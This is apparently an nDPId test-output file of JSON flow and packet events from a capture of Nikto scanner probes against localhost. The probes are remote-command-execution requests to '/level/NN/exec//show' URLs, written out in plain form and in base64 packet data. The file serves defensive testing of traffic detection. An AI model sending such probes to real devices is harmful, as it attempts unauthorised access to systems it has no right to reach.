00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}}
